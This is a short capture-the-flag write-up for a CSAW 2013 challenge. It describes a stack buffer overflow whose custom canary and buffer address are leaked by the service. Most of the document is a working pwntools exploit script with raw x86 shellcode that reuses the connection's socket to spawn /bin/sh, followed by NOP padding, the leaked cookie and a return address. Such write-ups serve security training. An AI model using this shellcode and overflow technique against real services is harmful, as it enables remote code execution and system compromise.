Csaw 2013
This problem had a buffer overflow and no protection except aslr and it had a custom made cannary and it also leaked cannry value and adreess of buufer
everything made simple the probem here was it was foking a connection so normal shellcode would yeild a shell in parent process not on child so we no use
Re-use fd Shellcode Which binds a shell to our current socket ... thats it !!!
from pwn import *
r=remote('0.0.0.0',31338)
buff=r.recv(4)
buff=unpack(buff)
print "[+] Adress of buffer ="+str(hex(buff))
cookie=r.recv(4)
cookie=unpack(cookie)
print "[+] Value of Cookie ="+str(hex(cookie))
msg=r.recvuntil(':')
print msg
#raw_input("wait")
payload="\x54\x59\x6a\x7f\x54\x51\x6a\x7f\x54\x59\x6a\x07\x5b\xff\x09\x6a\x66\x58\xcd\x80\x85\xc0\x75\xf5\x5b\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x41\x31\xd2\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x6a\x0b\x58\xcd\x80"+"\x90"*1991+pack(cookie)+"\x90"*12+pack(buff)
r.send(payload)
r.interactive()